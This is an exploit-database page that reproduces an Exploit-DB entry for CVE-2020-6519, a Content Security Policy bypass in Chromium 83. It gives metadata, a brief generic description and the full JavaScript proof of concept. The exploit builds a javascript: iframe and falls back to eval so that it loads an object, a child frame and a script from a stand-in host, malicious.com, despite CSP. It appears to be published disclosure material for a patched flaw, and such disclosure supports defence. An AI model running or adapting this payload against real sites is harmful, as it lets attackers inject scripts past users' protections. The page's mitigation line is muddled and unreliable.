header-logo
Suggest Exploit
vendor:
Chromium
by:
Gal Weizman
6.5
CVSS
MEDIUM
Full CSP Bypass
16
CWE
Product Name: Chromium
Affected Version From: 83
Affected Version To: 83
Patch Exists: YES
Related CWE: CVE-2020-6519
CPE: a:chromium:chromium
Metasploit: https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2020-6519/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2020-6519/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2020-6519/https://www.rapid7.com/db/vulnerabilities/microsoft-edge-cve-2020-6519/https://www.rapid7.com/db/vulnerabilities/google-chrome-cve-2020-6519/https://www.rapid7.com/db/vulnerabilities/debian-cve-2020-6519/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-6514/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-6533/https://www.rapid7.com/db/vulnerabilities/suse-cve-2020-6519/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-6517/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-6518/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-6524/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-6525/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-6527/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-6534/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-6536/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-6529/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-6530/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-6531/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-6535/https://www.rapid7.com/db/?q=CVE-2020-6519&type=&page=2https://www.rapid7.com/db/?q=CVE-2020-6519&type=&page=2
Other Scripts: N/A
Platforms Tested: Mac OS, Windows, iPhone, Android
2020

Chromium 83 – Full CSP Bypass

A vulnerability in Chromium 83 allows attackers to bypass the Content Security Policy (CSP) and execute malicious code. The vulnerability is due to the way the browser handles the Content Security Policy (CSP) when processing certain requests. An attacker can exploit this vulnerability by sending a specially crafted request to the target system. This will allow the attacker to bypass the CSP and execute malicious code.

Mitigation:

Upgrade to the latest version of Chromium 83 or later.
Source

Exploit-DB raw data:

#Title: Chromium 83 - Full CSP Bypass
#Date: 02/09/2020
#Exploit Author: Gal Weizman
#Vendor Homepage: https://www.chromium.org/ 
#Software Link: https://download-chromium.appspot.com/
#Version: 83
#Tested On: Mac OS, Windows, iPhone, Android
#CVE: CVE-2020-6519

(function(){

		var payload = `
			top.SUCCESS = true;
			var o = document.createElement("object");
			o.data = \`http://malicious.com/bypass-object-src.html\`;
			document.body.appendChild(o);
			var i = document.createElement("iframe");
			i.src = \`http://malicious.com/bypass-child-src.html\`;
			document.body.appendChild(i);
			var s = document.createElement("script");
			s.src = \`http://malicious.com/bypass-script-src.js\`;
			document.body.appendChild(s);
		`;

		document.body.innerHTML+="<iframe id='XXX' src='javascript:" + payload +"'></iframe>";
		setTimeout(() => {
				if (!top.SUCCESS) {
						XXX.contentWindow.eval(payload);
				}
		});

}())

// further information: https://github.com/weizman/CVE-2020-6519

Navigation

Suggest Exploit

Services By CQR